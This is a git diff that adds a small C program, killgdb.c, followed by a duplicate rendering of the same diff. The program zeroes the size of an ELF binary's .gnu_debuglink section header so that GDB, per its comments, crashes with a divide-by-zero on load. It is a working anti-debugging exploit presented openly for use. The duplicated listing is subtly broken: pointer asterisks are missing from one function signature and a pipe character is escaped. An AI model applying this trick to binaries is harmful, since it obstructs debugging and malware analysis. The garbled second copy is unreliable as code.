1 files changed, 49 insertions, 0 deletions
diff --git a/crash/killgdb.c b/crash/killgdb.c
new file mode 100644
index 0000000..8f97ba3
--- /dev/null
+++ b/crash/killgdb.c
@@ -0,0 +1,49 @@
+#include <elf.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+// killgdb.c - prevent an elf from being loaded by gdb.
+// Jeffrey Crowell <crowell [at] bu [dot] edu>
+//
+// $ objcopy --only-keep-debug program program.debug
+// $ strip program
+// $ objcopy --add-gnu-debuglink=program.debug program
+// $ ./killgdb program
+//
+// GDB can't handle debuglink sections of size 0, there's a divide by 0 error.
+// We can exploit this to make gdb crash on load of elfs.
+int filesize(int fd) { return (lseek(fd, 0, SEEK_END)); }
+void print_section(Elf64_Shdr *shdr, char *strTab, int shNum,
+                        uint8_t *data) {
+  int i;
+  for (i = 0; i < shNum; i++) {
+    size_t k;
+    if (!strcmp(".gnu_debuglink", &strTab[shdr[i].sh_name])) {
+      printf("%02d: %s Offset %lx\n", i, &strTab[shdr[i].sh_name],
+             shdr[i].sh_offset);
+      printf("Setting size to zero.\n");
+      shdr[i].sh_size = 0;
+    }
+  }
+}
+int main(int ac, char **av) {
+  void *data;
+  Elf64_Ehdr *elf;
+  Elf64_Shdr *shdr;
+  int fd;
+  char *strtab;
+  fd = open(av[1], O_RDWR);
+  data = mmap(NULL, filesize(fd), PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+  elf = (Elf64_Ehdr *)data;
+  shdr = (Elf64_Shdr *)(data + elf->e_shoff);
+  strtab = (char *)(data + shdr[elf->e_shstrndx].sh_offset);
+  print_section(shdr, strtab, elf->e_shnum, (uint8_t*)data);
+  close(fd);
+  return 0;
+}

diff --git a/crash/killgdb.c b/crash/killgdb.c new file mode 100644 index 0000000..8f97ba3 --- /dev/null +++ b/crash/killgdb.c
@@ -0,0 +1,49 @@
	1	#include <elf.h>
	2	#include <fcntl.h>
	3	#include <stdio.h>
	4	#include <stdlib.h>
	5	#include <sys/mman.h>
	6
	7	// killgdb.c - prevent an elf from being loaded by gdb.
	8	// Jeffrey Crowell <crowell [at] bu [dot] edu>
	9	//
	10	// $ objcopy --only-keep-debug program program.debug
	11	// $ strip program
	12	// $ objcopy --add-gnu-debuglink=program.debug program
	13	// $ ./killgdb program
	14	//
	15	// GDB can't handle debuglink sections of size 0, there's a divide by 0 error.
	16	// We can exploit this to make gdb crash on load of elfs.
	17
	18	int filesize(int fd) { return (lseek(fd, 0, SEEK_END)); }
	19
	20	void print_section(Elf64_Shdr shdr, char strTab, int shNum,
	21	uint8_t *data) {
	22	int i;
	23	for (i = 0; i < shNum; i++) {
	24	size_t k;
	25	if (!strcmp(".gnu_debuglink", &strTab[shdr[i].sh_name])) {
	26	printf("%02d: %s Offset %lx\n", i, &strTab[shdr[i].sh_name],
	27	shdr[i].sh_offset);
	28	printf("Setting size to zero.\n");
	29	shdr[i].sh_size = 0;
	30	}
	31	}
	32	}
	33
	34	int main(int ac, char **av) {
	35	void *data;
	36	Elf64_Ehdr *elf;
	37	Elf64_Shdr *shdr;
	38	int fd;
	39	char *strtab;
	40
	41	fd = open(av[1], O_RDWR);
	42	data = mmap(NULL, filesize(fd), PROT_READ \| PROT_WRITE, MAP_SHARED, fd, 0);
	43	elf = (Elf64_Ehdr *)data;
	44	shdr = (Elf64_Shdr *)(data + elf->e_shoff);
	45	strtab = (char *)(data + shdr[elf->e_shstrndx].sh_offset);
	46	print_section(shdr, strtab, elf->e_shnum, (uint8_t*)data);
	47	close(fd);
	48	return 0;
	49	}